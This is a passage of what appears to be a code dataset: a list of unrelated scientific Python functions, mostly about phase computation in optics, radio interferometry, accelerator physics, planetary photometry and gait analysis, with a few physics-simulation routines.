# Unravelling 2*pi phase jumps\n ph0_ind = np.int(Et.shape[0] / 2) # Center index\n ph = np.angle(Et)\n ph_diff = np.diff(ph)\n # We need to sample often enough that the difference in phase is less than 5 rad\n # A larger jump is taken as a 2*pi phase jump\n ph_ind = np.where(np.abs(ph_diff) > 5.0)\n # Loop through the 2*pi phase jumps\n for ind in ph_ind[0]:\n if ph_diff[ind] < 0:\n ph[ind + 1:] += 2 * np.pi\n else:\n ph[ind + 1:] -= 2 * np.pi\n\n # Find relevant portion of the pulse (intensity above a threshold value)\n ph0 = ph[ph0_ind]\n Et_mag = np.abs(Et)\n low_ind = np.where(Et_mag < eps)\n ph[low_ind] = np.nan\n\n # Here we could go through contiguous regions and make the phase connect at the edges...\n\n # Linear compensation is we have a frequency shift (remove 1st order phase)\n if linear_comp is True:\n idx = np.isfinite(ph)\n x = np.arange(Et.shape[0])\n ph_poly = np.polyfit(x[idx], ph[idx], 1)\n ph_out = ph - np.polyval(ph_poly, x)\n else:\n ph_out = ph - ph0\n else:\n ph_out = None\n return ph_out", "def phase_offset(frq,start,base):\r\n \r\n if type(start)==datetime:\r\n dx = start - base\r\n dx = dx.total_seconds()\r\n else:\r\n dx = start -base\r\n \r\n return np.mod(dx*np.array(frq),2*np.pi)", "def phaseshift(self, dl=0, dm=0, im=[[0]], size=0):\n\n ang = lambda dl,dm,u,v,freq: (dl*n.outer(u,freq/self.freq_orig[0]) + dm*n.outer(v,freq/self.freq_orig[0])) # operates on single time of u,v\n\n if ((len(im) != 1) & (size != 0)):\n y,x = n.where(im == im.max())\n length = len(im)\n dl = (length/2 - x[0]) * 1./size\n dm = (y[0] - length/2) * 1./size\n print 'Shifting phase center to image peak: (dl,dm) = (%e,%e) = (%e,%e) arcsec' % (dl, dm, n.degrees(dl)*3600, n.degrees(dm)*3600)\n elif isinstance(dl,n.ndarray) and isinstance(dm,n.ndarray):\n if not len(dl) == self.nints:\n raise ValueError('dl is an array but its length (%d) does not match the number of integrations (%d)' % (len(dl),self.nints))\n \n elif ((dl != 0) | (dm != 0)):\n print 'Shifting phase center by given (dl,dm) = (%e,%e) = (%e,%e) arcsec' % (dl, dm, n.degrees(dl)*3600, n.degrees(dm)*3600)\n dl = dl * n.ones(self.nints)\n dm = dm * n.ones(self.nints)\n else:\n raise ValueError('Need to give either dl or dm, or im and size.')\n\n for i in xrange(self.nints):\n for pol in xrange(self.npol):\n self.data[i,:,:,pol] = self.data[i,:,:,pol] * n.exp(-2j*n.pi*ang(dl[i], dm[i], self.u[i], self.v[i], self.freq))\n \n self.l0 = self.l0 + dl\n self.m0 = self.m0 + dm\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real # multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'New dataph min, max:'\n print self.min, self.max", "def phase(self):\r\n return 0.2 * self.weights", "def backward_phi(self):\n for f in self.component_fields:\n f.require_grid_space()", "def ramp4n(params, phase, args=dict(n=5, guess=[1, -3.7e-4, -0.94, 0.087, -1.08])):\n # 2013-12-07 14:08 IJMC: Created.\n\n return params[0] * (1. - np.exp(-params[1]*phase + params[2]) + \\\n params[3] * (phase - 0.5) + \\\n params[4] * (phase - 0.5)**2)", "def d4out():\n\td4x.moveTo(d4x_out)\n\td4y.moveTo(d4y_out)", "def phaseEstimator2(phases,omegas,T_s,k):\n \n \n length = phases.shape[0]\n pis = np.tile(2*np.pi,length)\n a = phases - k*omegas\n phaseShifts = np.mod(a,pis)\n\n averagedPhaseShift = np.sum(phaseShifts)/length\n \n estimatedPhase = np.mod(averagedPhaseShift + k*omegas,pis)\n #estimatedPhase = np.array([np.pi/2,np.pi/2,np.pi/2]) + k*omegas\n \n return estimatedPhase", "def get_phase_data(self, space):\n if not space:\n return self\n ##dim = len(space)\n phases = set(self.phases)\n others = set(self.phases_by_elt.keys()) - set(space)\n for elt in others:\n phases -= self.phases_by_elt[elt]\n pd = PhaseData()\n pd.phases = phases\n return pd", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def em_phase(indivs):\r\n\t#get the start frequency using dirichlet distribution.\r\n\thyplo_collection=[]\r\n\tindiv_dict=defaultdict(list)\r\n\t# hyplo_dict=defaultdict(float)\r\n\tres=[]\r\n\tres_pairs=[]\r\n\tfor x in indivs:\r\n\t\tdecom=decompose_acurate(x)\r\n\t\tindiv_dict[x]+=decom\r\n\t\thyplo_collection+=list(itertools.chain.from_iterable(decom))\r\n\treturn em(indiv_dict, hyplo_collection)", "def make_phase(mag, omega, phi, samples, end_time):\n\n array_time = np.linspace(0, end_time, samples)\n\n x = omega * array_time + phi\n\n return to_complex(mag, x), array_time", "def Spherical_aberrations_surface_addup(self):\n bf=beam_field()\n bf.U=np.array([[[0,0,1],[0,0,1],[0,0,1]]])\n pp=self.entrance_pupil\n bf.Q_p=np.array([[[0,0,0],[0,pp/10.,0],[0,pp,0]]]) \n bf.propagate(self.surfaces)\n i,x=bf.calculate_intersections(bf.U[:,[0]],bf.Q_p[:,[0]],bf.U[:,[1]],bf.Q_p[:,[1]])\n \n i2,x2=bf.calculate_intersections(bf.U[:,[0]],bf.Q_p[:,[0]],bf.U[:,[2]],bf.Q_p[:,[2]])\n \n #print(i[:,:,2]-i2[:,:,2])", "def pro_avfid_superoperator_compsubspace_phasecorrected(U,L1,phases):\n\n Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],\n [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],\n [0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0],\n [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],\n [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],\n [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0],\n [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0],\n [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[1])), 0],\n [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0]))]],\n type='oper',\n dims=[[3, 3], [3, 3]])\n\n if U.type=='oper':\n U=Ucorrection*U\n inner = U.dag()*U_target\n part_idx = [0, 1, 3, 4] # only computational subspace\n ptrace = 0\n for i in part_idx:\n ptrace += inner[i, i]\n dim = 4 # 2 qubits comp subspace \n\n return np.real(((np.abs(ptrace))**2+dim*(1-L1))/(dim*(dim+1)))\n\n elif U.type=='super':\n U=qtp.to_super(Ucorrection)*U\n kraus_form = qtp.to_kraus(U)\n dim=4 # 2 qubits in the computational subspace\n part_idx = [0, 1, 3, 4] # only computational subspace\n psum=0\n for A_k in kraus_form:\n ptrace = 0\n inner = U_target_diffdims.dag()*A_k # otherwise dimension mismatch\n for i in part_idx:\n ptrace += inner[i, i]\n psum += (np.abs(ptrace))**2\n\n return np.real((dim*(1-L1) + psum) / (dim*(dim + 1)))", "def plot_phase_plane_closed_loop( self , x_axis = 0 , y_axis = 1 ):\n\n pp = phaseanalysis.PhasePlot( self.plant , x_axis , y_axis )\n \n pp.compute_grid()\n pp.plot_init()\n \n # Closed-loop Behavior\n pp.color = 'b'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n # Open-Loop Behavior\n pp.f = self.fzbar # assume default internal states\n pp.ubar = self.ubar\n pp.color = 'r'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n pp.plot_finish()\n \n return pp", "def get_phases(getllm_d, mad_twiss, ListOfFiles, tune_q, plane):\r\n commonbpms = utils.bpm.intersect(ListOfFiles)\r\n commonbpms = utils.bpm.model_intersect(commonbpms, mad_twiss)\r\n commonbpms = JPARC_intersect(plane, getllm_d, commonbpms)\r\n length_commonbpms = len(commonbpms)\r\n\r\n if length_commonbpms < 3:\r\n print >> sys.stderr, \"get_phases: Less than three BPMs provided for plane \" + plane + \". Please check input.\"\r\n return [{}, 0, 0, []]\r\n\r\n #-- Last BPM on the same turn to fix the phase shift by tune_q for exp data of LHC\r\n # this would be the elegant way:\r\n \r\n if getllm_d.lhc_phase == \"1\":\r\n if getllm_d.accel == \"JPARC\":\r\n s_lastbpm = None\r\n elif getllm_d.accel == \"LHCB1\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L2.B1']]\r\n elif getllm_d.accel == \"LHCB2\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L8.B2']]\r\n elif getllm_d.accel == \"PETRA\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPM_SOR_46']]\r\n \r\n # this is the practical way:\r\n \r\n# if getllm_d.lhc_phase == \"1\":\r\n# print \"phase jump is compensated [get_phases]\"\r\n# if \"MOH.3\" in mad_twiss.NAME:\r\n# getllm_d.beam_direction = 1.0\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['MOH.5']]\r\n# tune_q = 0\r\n# print \"--> for JPARC (at S = {0:f} tune_q = {1:f}, bd = {2:f})\".format(s_lastbpm, tune_q, getllm_d.beam_direction)\r\n# #s_lastbpm = mad_twiss.S[mad_twiss.indx['MOH.5']]\r\n# elif \"BPMSW.1L2.B1\" in mad_twiss.NAME:\r\n# print \"--> for LHC\"\r\n# if getllm_d.accel == \"LHCB1\":\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L2.B1']]\r\n# elif getllm_d.accel == \"LHCB2\":\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L8.B2']]\r\n# \r\n\r\n mu = 0.\r\n tunem = []\r\n phase = {} # Dictionary for the output containing [average phase, rms error]\r\n\r\n for i in range(length_commonbpms): # To calculate the tune\r\n bpm = str.upper(commonbpms[i % length_commonbpms][1])\r\n\r\n tunemi = []\r\n for src_twiss in ListOfFiles:\r\n # Phase is in units of 2pi\r\n if plane == 'H':\r\n src_twiss_tune_column = src_twiss.TUNEX\r\n elif plane == 'V':\r\n src_twiss_tune_column = src_twiss.TUNEY\r\n tunemi.append(src_twiss_tune_column[src_twiss.indx[bpm]])\r\n\r\n tunemi = np.array(tunemi)\r\n if i < length_commonbpms-1:\r\n tunem.append(np.average(tunemi))\r\n\r\n # Note that the phase advance between the last monitor and the first monitor should be find by taking into account the fractional part of tune.\r\n if i == length_commonbpms-2:\r\n tunem = np.array(tunem)\r\n tune = np.average(tunem)\r\n\r\n for i in range(length_commonbpms): # To find the integer part of tune as well, the loop is up to the last monitor\r\n bpms = [str.upper(commonbpms[j % length_commonbpms][1]) for j in range(i, i+11)] # seven consecutive monitors\r\n p_i = {1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[], 10:[]} # dict for the six bpm pairs i.e. p_i[1] is for pair bpm[0], bpm[1]\r\n \r\n \r\n if bpms[0] in getllm_d.important_pairs:\r\n number = 1\r\n for second_bpm in getllm_d.important_pairs[bpms[0]]:\r\n p_i[10 + number] = []\r\n bpms.append(second_bpm)\r\n number += 1\r\n \r\n for src_twiss in ListOfFiles:\r\n # Phase is in units of 2pi\r\n p_m = {}\r\n if plane == 'H':\r\n twiss_column = src_twiss.MUX\r\n elif plane == 'V':\r\n twiss_column = src_twiss.MUY\r\n for bpm_pair in p_i:\r\n try:\r\n p_m[bpm_pair] = twiss_column[src_twiss.indx[bpms[bpm_pair]]] - twiss_column[src_twiss.indx[bpms[0]]]\r\n except:\r\n p_m[bpm_pair] = 10000000000\r\n \r\n #-- To fix the phase shift by tune_q in LHC\r\n if tune_q is not None:\r\n try:\r\n for bpm_pair in p_m:\r\n if mad_twiss.S[mad_twiss.indx[bpms[0]]] <= s_lastbpm and mad_twiss.S[mad_twiss.indx[bpms[bpm_pair]]] > s_lastbpm:\r\n p_m[bpm_pair] += getllm_d.beam_direction*tune_q\r\n if mad_twiss.S[mad_twiss.indx[bpms[0]]] > s_lastbpm and mad_twiss.S[mad_twiss.indx[bpms[bpm_pair]]]<=s_lastbpm:\r\n p_m[bpm_pair] += -getllm_d.beam_direction*tune_q\r\n except:\r\n pass\r\n for bpm_pair in p_i:\r\n if p_m[bpm_pair] < 0:\r\n p_m[bpm_pair] += 1\r\n p_i[bpm_pair].append(p_m[bpm_pair])\r\n\r\n for bpm_pair in p_i:\r\n p_i[bpm_pair] = np.array(p_i[bpm_pair])\r\n\r\n if getllm_d.beam_direction == -1: # for the beam circulating reversely to the model\r\n for bpm_pair in p_i:\r\n p_i[bpm_pair] = 1 - p_i[bpm_pair]\r\n\r\n p_std = {}\r\n for bpm_pair in p_i:\r\n p_std[bpm_pair] = calc_phase_std(p_i[bpm_pair], 1.)\r\n p_i[bpm_pair] = calc_phase_mean(p_i[bpm_pair], 1.)\r\n\r\n if i >= length_commonbpms-10:\r\n p_i[10] = _phi_last_and_last_but_one(p_i[10], tune)\r\n for j in range(1,10):\r\n if i >= length_commonbpms-j:\r\n p_i[j] = _phi_last_and_last_but_one(p_i[j], tune)\r\n\r\n p_mdl = {}\r\n if plane == 'H':\r\n twiss_column = mad_twiss.MUX\r\n elif plane == 'V':\r\n twiss_column = mad_twiss.MUY\r\n for bpm_pair in p_i:\r\n p_mdl[bpm_pair] = twiss_column[mad_twiss.indx[bpms[bpm_pair]]] - twiss_column[mad_twiss.indx[bpms[0]]]\r\n\r\n if i >= length_commonbpms-10:\r\n if plane == 'H':\r\n madtune = mad_twiss.Q1 % 1\r\n elif plane == 'V':\r\n madtune = mad_twiss.Q2 % 1\r\n if madtune > .5:\r\n madtune -= 1\r\n\r\n p_mdl[10] = p_mdl[10] % 1\r\n p_mdl[10] = _phi_last_and_last_but_one(p_mdl[10], madtune)\r\n for j in range(1, len(p_i)): # iterate only over the first 5 bpm pairs\r\n if i >= length_commonbpms-j:\r\n p_mdl[j] = p_mdl[j] % 1\r\n p_mdl[j] = _phi_last_and_last_but_one(p_mdl[j], madtune)\r\n\r\n small = 1e-7\r\n phase_advances_all_bpms = np.zeros(len(p_i))\r\n phase_advances_all_bpms_std = np.zeros(len(p_i))\r\n for bpm_pair in p_i:\r\n if abs(p_mdl[bpm_pair]) < small:\r\n p_mdl[bpm_pair] = small\r\n print \"Note: Phase advance (Plane\" + plane + \") between \" + bpms[0] + \" and \" + bpms[bpm_pair] + \" in MAD model is EXACTLY n*pi. GetLLM slightly differ the phase advance here, artificially.\"\r\n print \"Beta from amplitude around this monitor will be slightly varied.\"\r\n if abs(p_i[bpm_pair]) < small:\r\n p_i[bpm_pair] = small\r\n print \"Note: Phase advance (Plane\" + plane + \") between \" + bpms[0] + \" and \" + bpms[bpm_pair] + \" in measurement is EXACTLY n*pi. GetLLM slightly differ the phase advance here, artificially.\"\r\n print \"Beta from amplitude around this monitor will be slightly varied.\"\r\n phase[\"\".join([plane,bpms[0],bpms[bpm_pair]])] = [p_i[bpm_pair], p_std[bpm_pair], p_mdl[bpm_pair]]\r\n\r\n for i in range(len(p_i)):\r\n phase_advances_all_bpms[i] = p_i[i+1]\r\n phase_advances_all_bpms_std[i] = p_std[i+1]\r\n\r\n best_bpm_idx = (np.abs(phase_advances_all_bpms[:3]-0.25)).argmin()\r\n \r\n best_90degrees_bpm = bpms[best_bpm_idx + 1]\r\n best_90degrees_phase = phase_advances_all_bpms[best_bpm_idx]\r\n best_90degrees_phase_std = phase_advances_all_bpms_std[best_bpm_idx]\r\n \r\n phase[bpms[0]] = [p_i[1], p_std[1], p_i[2], p_std[2], p_mdl[1], p_mdl[2], bpms[1], best_90degrees_bpm, best_90degrees_phase, best_90degrees_phase_std]\r\n\r\n return [phase, tune, mu, commonbpms]", "def phase_Venus_2(alpha):\n phase = 10.**(-0.4*( - 2.81914e-00*alpha + 8.39034e-03*alpha**2.))\n #1 Scale Properly\n h1 = phase_Venus_1(163.7) - 0. #Total height desired over range\n h2 = 10.**(-0.4*( - 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)) - 10.**(-0.4*( - 2.81914e-00*179. + 8.39034e-03*179.**2.))\n phase = phase * h1/h2 #Scale so height is proper\n #2 Lateral movement to make two functions line up\n difference = phase_Venus_1(163.7) - h1/h2*(10.**(-0.4*( - 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)))\n phase = phase + difference\n\n # + \n #-(- 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)\n # - 1.\n return phase", "def _ampl_phase(self, coeffs):\n return coeffs[:len(coeffs)/2], coeffs[len(coeffs)/2:]", "def phase_Earth(alpha):\n phase = 10.**(-0.4*(- 1.060e-3*alpha + 2.054e-4*alpha**2.))\n return phase", "def processPhaseSequence(self):\n phasesInRing1, phasesInRing2 = ([] for i in range(2))\n\n [phasesInRing1.append(index+1) for index, value in enumerate(self.phaseDurationList) if value > 0.0 and index < 4]\n [phasesInRing2.append(index+1) for index, value in enumerate(self.phaseDurationList) if value > 0.0 and index >= 4]\n\n if len(phasesInRing1) > 0 and len(phasesInRing2) > 0:\n self.phaseSequenceInRing1.extend(phasesInRing1)\n self.phaseSequenceInRing2.extend(phasesInRing2)\n\n self.processPhaseHeight(phasesInRing1, phasesInRing2)", "def combine_phase(laz, raz, grf_lf_ind, grf_rf_ind, hz, acc_hip_z, acc_hip_x, total_accel):\n # reshape for faster computation\n laz = laz.values.reshape(-1, )\n raz = raz.values.reshape(-1, )\n\n # Check and mark rows with missing data\n length = len(laz)\n missing_data = False\n nan_row = []\n if np.isnan(laz).any() or np.isnan(raz).any():\n missing_data = True\n if missing_data:\n nan_row = np.where(np.isnan(laz) | np.isnan(raz))[0]\n finite_row = np.array(list(set(range(length)) - set(nan_row)))\n laz = np.delete(laz, nan_row, )\n raz = np.delete(raz, nan_row, )\n\n # Filter through low-pass filter\n la_magn = filter_data(laz, filt='low', highcut=ct.cutoff_magn, fs=hz)\n ra_magn = filter_data(raz, filt='low', highcut=ct.cutoff_magn, fs=hz)\n\n acc_hip_z = filter_data(acc_hip_z, filt='low', highcut=6)\n acc_hip_x = filter_data(acc_hip_x, filt='low', highcut=40)\n acc_hip = filter_data(total_accel, filt='low', highcut=15)\n\n # Get balance/movement phase and start and end of movement phase for both\n # right and left foot\n lf_ph, lf_sm, lf_em = _body_phase(la_magn, hz)\n rf_ph, rf_sm, rf_em = _body_phase(ra_magn, hz)\n\n _impact_detect(phase=lf_ph,\n start_move=lf_sm,\n end_move=lf_em,\n grf=grf_lf_ind,\n acc_hip_z=acc_hip_z,\n acc_hip_x=acc_hip_x,\n acc_hip=acc_hip) # detect and add impacts\n del lf_sm, lf_em # no use in further computations\n\n _impact_detect(phase=rf_ph,\n start_move=rf_sm,\n end_move=rf_em,\n grf=grf_rf_ind,\n acc_hip_z=acc_hip_z,\n acc_hip_x=acc_hip_x,\n acc_hip=acc_hip) # detect and add impacts\n del rf_sm, rf_em, raz # no use in further computations\n\n # Insert previous value for phase where data needed to predict was missing\n if missing_data:\n phase_lf = np.ones(length).astype(int)\n phase_lf[finite_row] = lf_ph\n phase_rf = np.ones(length).astype(int)\n phase_rf[finite_row] = rf_ph\n for i in nan_row:\n phase_lf[i] = phase_lf[i - 1]\n phase_rf[i] = phase_rf[i - 1]\n else:\n phase_lf, phase_rf = lf_ph, rf_ph\n\n return phase_lf, phase_rf", "def step(self):\n lmax = 32\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def D1(t, s, m):\n return 1 / 3 * np.sum((ph[2::2] - ph[:-2:2]) *\n (np.cos(m * ph[:-2:2] * star.rho[:-2:2, t, s])\n + 4 * np.cos(m * ph[1:-1:2] * star.rho[1:-1:2, t, s]) +\n np.cos(m * ph[2::2] * star.rho[2::2, t, s])))\n\n def D2(s, l, m):\n sum = 0\n for t in range(0, K - 2, 2):\n sum += (mu[t + 2] - mu[t]) * (lpmv(m, l, mu[t]) * D1(t, s, m) +\n 4 * lpmv(m, l, mu[t + 1]) * D1(t + 1, s, m) +\n lpmv(m, l, mu[t + 2]) * D1(t + 2, s, m))\n\n return sum / 3\n\n def D3(l, m, k):\n sum = 0\n\n def fl(r_dash, r):\n if r_dash < r:\n return r_dash**(l + 2) / r**(l + 1)\n else:\n return r**l / r_dash**(l - 1)\n\n for s in range(0, N - 2, 2):\n sum += (r[s + 2] - r[s]) * (fl(r[s], r[k]) * D2(s, l, m) +\n 4 * fl(r[s + 1], r[k]) * D2(s + 1, l, m) +\n fl(r[s + 2], r[k]) * D2(s + 2, l, m))\n\n return sum / 6\n\n def calc_Phi(i, j, k):\n Phi = 0\n\n for l in range(lmax + 1):\n for m in range(min(l + 1, 2)):\n if (m + l % 2 == 1):\n continue\n if m == 0:\n eps = 1\n else:\n eps = 2\n Phi -= eps / factorial(1 + m) * \\\n D3(l, m, k) * lpmv(m, l, mu[j]) * np.cos(m * ph[i])\n\n return Phi\n\n # calculate Phi across grid\n for n in range(N):\n for k in range(K):\n for m in range(M):\n star.Phi[m, k, n] = calc_Phi(m, k, n)\n\n print(f'Phi = {star.Phi[0,0,:]}')\n\n # update the enthalpy\n\n Omega2 = star.eos.Omega2(star.Phi, star.Psi)\n C = star.eos.C(star.Phi, star.Psi)\n\n H = C - star.Phi - Omega2 * star.Psi\n\n # use new enthalpy and Phi to calculate the density\n\n star.rho = star.eos.rho_from_h(H)\n star.rho /= np.max(star.rho)\n\n print(f\"rho = {np.average(star.rho[:,0,:], axis=0)}\")\n\n # make sure density is always non-negative\n # star.rho[star.rho < 0] = 0\n\n print(f\"rho = {np.average(star.rho[:,0,:], axis=0)}\")\n\n # calculate the errors\n\n H_err = np.max(np.abs(H - star.H)) / np.max(np.abs(H))\n\n if np.max(Omega2) == 0:\n if np.abs(Omega2 - star.Omega2) == 0:\n Omega2_err = 0\n else:\n Omega2_err = 1\n else:\n Omega2_err = np.abs(Omega2 - star.Omega2) / np.abs(Omega2)\n\n if np.max(star.C) == 0:\n if np.abs(C - star.C) == 0:\n C_err = 0\n else:\n C_err = 1\n else:\n C_err = np.abs(C - star.C) / np.abs(star.C)\n\n # set variables to new values\n\n star.H = H\n star.Omega2 = Omega2\n star.C = C\n print(\n f\"Errors: H_err = {H_err}, Omega2_err = {Omega2_err}, C_err = {C_err}\")\n\n return H_err, Omega2_err, C_err", "def _compute_normalized_phase(data):\n return (np.angle(hilbert(data)) + np.pi) / (2 * np.pi)", "def calculateElementQuadrature(self):\n #\n #get physical locations of quadrature points and jacobian information there\n #assume all components live on the same mesh\n #\n #mwf debug\n #import pdb\n #pdb.set_trace()\n self.u[0].femSpace.elementMaps.getValues(self.elementQuadraturePoints,\n self.q['x'])\n if self.movingDomain:\n if self.tLast_mesh != None:\n self.q['xt'][:]=self.q['x']\n self.q['xt']-=self.q['x_last']\n alpha = 1.0/(self.t_mesh - self.tLast_mesh)\n self.q['xt']*=alpha\n else:\n self.q['xt'][:]=0.0\n self.q['x_last'][:]=self.q['x']\n self.u[0].femSpace.elementMaps.getJacobianValues(self.elementQuadraturePoints,\n self.q['J'],\n self.q['inverse(J)'],\n self.q['det(J)'])\n self.q['abs(det(J))']=numpy.absolute(self.q['det(J)'])\n #\n # get physical space integration weights\n #\n self.q['dV'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n cfemIntegrals.calculateIntegrationWeights(self.q['abs(det(J))'],\n self.elementQuadratureWeights[('u',0)],\n self.q['dV'])\n for ci in range(self.nc): self.q[('dV_u',ci)] = self.q['dV']\n #\n #get shape information at the quadrature points\n #\n self.testSpace[0].getBasisValues(self.elementQuadraturePoints,\n self.q[('w',0)])\n cfemIntegrals.calculateWeightedShape(self.elementQuadratureWeights[('u',0)],\n self.q['abs(det(J))'],\n self.q[('w',0)],\n self.q[('w*dV',0)])\n cfemIntegrals.calculateWeightedShape(self.elementQuadratureWeights[('m',0)],\n self.q['abs(det(J))'],\n self.q[('w',0)],\n self.q[('w*dV_m',0)])\n self.testSpace[0].getBasisGradientValues(self.elementQuadraturePoints,\n self.q['inverse(J)'],\n self.q[('grad(w)',0)])\n cfemIntegrals.calculateWeightedShapeGradients(self.elementQuadratureWeights[('u',0)],\n self.q['abs(det(J))'],\n self.q[('grad(w)',0)],\n self.q[('grad(w)*dV',0)])\n\n #\n self.ellamDiscretization.updateElementQuadrature(self.q)\n #\n self.coefficients.initializeElementQuadrature(self.timeIntegration.t,self.q)", "def step_4(f: Callable[..., float], x: float, y: np.array, params: Tuple,\\\n h: float, k3: np.array) -> np.array:\n\n # Initialize the output vector.\n n = len(y)\n y_int = np.zeros(n)\n\n # Find dym/dx using the given function, then use it to compute dym-1/dx.\n y_int[0] = f(x + h, y + k3, *params) * h\n\n # Starting with dym-1/dx, compute the other values down to y/dx.\n for i in range(1, n):\n y_int[i] = (y[n-i] + k3[n-1]) * h\n\n # Reverse the output vector so y/dx is on top.\n y_int = np.flipud(y_int)\n\n return y_int", "def findphase(self):\n debug('ControllerStartup.findphase()')\n if not self.pidevice.HasFPH() or self.prop['skipfph']:\n return\n if not self._databuf['cstdone']:\n debug('no need to do find phase for axes %r', self.pidevice.axes)\n return\n for axis in self._databuf['cstdone']:\n if self.pidevice.qFRF(axis)[axis]:\n self.pidevice.FPH(axis)\n waitonphase(self.pidevice, **self._kwargs)\n self.pidevice.WPA()\n else:\n info('skip find phase for axis while axis %s is not referenced' % axis)", "def phosphorene_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [-s/2, -ay/2, h], 0),\n ('B', [ s/2, -ay/2, 0], 0),\n ('C', [-s/2 + ax/2, 0, 0], 0),\n ('D', [ s/2 + ax/2, 0, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5')\n )\n\n return lat", "def horde_step(self, observation):", "def phase(self):\n return -self.attrs['RFphase']*2*np.pi", "def _set_phase(self):\n self.phase = np.sign(self._model())", "def phase(self):\n return 0.0 * self.__weights", "def RTSpace( ref_el , deg ):\n sd = ref_el.get_spatial_dimension()\n\n vec_Pkp1 = polynomial_set.ONPolynomialSet( ref_el , deg+1 , (sd,) )\n\n dimPkp1 = expansions.polynomial_dimension( ref_el , deg+1 )\n dimPk = expansions.polynomial_dimension( ref_el , deg )\n dimPkm1 = expansions.polynomial_dimension( ref_el , deg-1 )\n\n vec_Pk_indices = reduce( lambda a,b: a+b , \\\n [ list(range(i*dimPkp1,i*dimPkp1+dimPk)) \\\n for i in range(sd) ] )\n vec_Pk_from_Pkp1 = vec_Pkp1.take( vec_Pk_indices )\n\n Pkp1 = polynomial_set.ONPolynomialSet( ref_el , deg + 1 )\n PkH = Pkp1.take( list(range(dimPkm1,dimPk)) )\n\n Q = quadrature.make_quadrature( ref_el , 